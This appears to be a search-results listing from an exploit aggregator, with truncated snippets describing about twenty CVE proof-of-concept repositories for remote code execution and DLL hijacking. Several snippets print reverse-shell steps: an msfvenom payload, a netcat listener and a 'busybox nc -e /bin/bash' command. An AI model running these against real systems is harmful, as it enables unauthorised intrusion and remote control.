2522 matches found
cve-2022-3218
ステップ 1 — 実際のペイロードを作成する Windows msfvenom -p windows/x64/shellreversetcp LHOST=10.8.5.50 LPORT=4444 -f exe -o exploit.exe ステップ 2 — HTTPでペイロードを提供する 同じディレクトリ内で: python3 -m http.server 80 ステップ 3 — エクスプロイトを調整する 次のように実行: python3 CVE-2022-3218.py 172.20.7.185 10.8.5.50 exploit.exe ステップ 4 — エクスプロイト前のリスナー ...
CVE-2025-32433-exploit
CVE-2025-32433-exploit rlwrap -cAr nc -lnvp 4444 python3 exploit.py...
CVE-2017-7494
CVE-2017-7494 Удалённый root-эксплойт для уязвимости SAMBA CVE-2017-7494. Описание Этот эксплойт состоит из двух частей: Сначала он компилирует полезную нагрузку "implant.c" и создаёт библиотеку libimplantx32.so или libimplantx64.so, которая переключается на пользователя root, отсоединяется от...
CVE-2026-23744-PoC
CVE-2026-23744-PoC Disclaimer: This proof-of-concept is provided exclusively for authorised security research, educational purposes, and controlled lab environments e.g., HTB, CTF, or internal penetration testing with explicit written consent. Unauthorised use against any system without permissio...
CVE-2017-8869
CVE-2017-8869 - MediaCoder 0.8.48.5888 - Local Buffer Overflow SEH Exploit rewritten with reverse shell option...
CVE-2025-8110-Gogs-RCE-Exploit
Gogs CVE-2025-8110 RCE Exploit An automated Python exploit for CVE-2025-8110 in Gogs. This vulnerability allows for Remote Code Execution RCE by abusing the PutContents API, which fails to validate if a file path is a symlink. By overwriting the internal .git/config file via a symlink, we can...
CVE-2024-39069
ifood Order Manager 'Gestor de Peddios.exe' - DLL hijacking An attacker places a malicious DLL named "d3d12.dll" in a directory that is searched by the application before the legitimate "d3d12.dll" is found. When the application is launched, it loads the malicious DLL instead of the legitimate on...
CVE-2025-49844-RediShell-AI-made-Revshell
CVE-2025-49844 RediShell AI-made Revshell PoC Untested completition of the Redishell PoC made by AI. Original PoC: https://github.com/raminfp/redisexploit/blob/main/exploitpoc.py Korean Piece: https://github.com/dwisiswant0/CVE-2025-49844/blob/master/CVE-2025-49844.lua Progress ? We later went...
CVE-2025-24893
Обратная оболочка для CVE-2025-24893 root@kitploit: python3 CVE-2025-24893.py -u http://wiki.editor.htb/ -c "busybox nc -e /bin/bash" Улучшение оболочки 1. python3 -c 'import pty; pty.spawn"/bin/bash"' 2. ctrl + z 3. stty size 4. stty raw -echo; fg 5. stty rows x columns y 6. export TERM=xterm...
CVE-2023-37903
CVE-2023-37903 Exploit for CVE-2023-37903 Proof Of Concept & Reverse Shell CVE Owned by: SeungHyun Lee...
CVE-2014-6287
Poc exploitbash script bash.webm About the exploit You can get reverse shell with .sh file in Linux You can get reverse shell with .py file in Windows and Linux in windows, you need to install netcat You must specify the url example: http://target.com/ using for .py: python exploit.py using for...
CVE-2012-2982
This PoC exploit for CVE-2012-2982 was written as an exercise for the "Intro to PoC scripting" Room on TryHackMe. The room can be found here: https://tryhackme.com/room/intropocscripting I was originally going to use Python to follow along, but decided to practice my Rust skills instead. I also s...
CVE-2022-36267-PoC
CVE-2022-36267 - Airspan AirSpot 5410 Unauthenticated Remote Command Injection. Overview This repository contains a Proof of Concept PoC reverse shell script for exploiting CVE-2022-36267, a critical vulnerability in Airspan AirSpot 5410 devices. The script is a practical demonstration,...
Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564
CVE-2023-50564 - Pluck CMS v4.7.18 Remote Code Execution RCE Exploit Description This script exploits a Remote Code Execution RCE vulnerability in Pluck CMS v4.7.18. The vulnerability allows a malicious user to upload a malicious PHP file to the server and execute it, gaining remote command...
CVE-2022-22947
CVE-2022-22947 CVE-2022-22947EXP,CVE-2022-22947RCE Usage Reverse Shell python3 CVE-2022-22947.py 目标网址 弹shell的IP 端口 Execute Command python3 CVE-2022-22947.py 目标网址 命令...
langflow-rce-exploit
Langflow RCE Exploit CVE-2025-3248 Remote Code Execution Exploit for Langflow CVE-2025-3248 Features Automatic vulnerability detection Multiple exploitation modes: Interactive shell Single command execution Reverse shell connection File upload capability Colorized user interface Multiple reverse...
xwiki_solrsearch-rce-exploit
solrsearch-rce-exploit Unauth RCE PoC for XWiki SolrSearch CVE-2025-24893. Command exec + reverse shell. CVE-2025-24893 – XWiki SolrSearch RCE PoC Proof-of-concept for the XWiki SolrSearch template injection leading to unauthenticated remote code execution. Tested against XWiki Debian 15.10.8...
CVE-2025-24893-PoC
CVE-2025-24893-PoC XWiki Unauthenticated RCE Exploit Affected XWiki Versions Versions 15.10.11 Versions 16.4.1 Versions 16.5.0RC1 Vulnerability Description Affected XWiki versions contain a Remote Code Execution vulnerability caused by unsafe Groovy expression handling in the SolrSearch macro...
CVE-2025-56383
Уязвимость root@kitploit: Тип атаки: DLL Hijacking захват DLL Целевое приложение: Notepad++ Метод: Файл NppExport.dll загружается Notepad++ из рабочей директории Реализация Вредоносная DLL содержит: root@kitploit: Экспортируемые функции оригинальной библиотеки для обеспечения совместимости Revers...
bassmaster-rce
bassmaster-rce Exploitation de CVE-2014-7205 par injection de JavaScript arbitraire conduisant à une exécution de code à distance. Je suis tombé sur ce post de LuuPhu écrit en vietnamien. Comme j'ai déjà écrit du code en NodeJS mais que je n'avais jamais eu l'occasion de l'exploiter, je me suis d...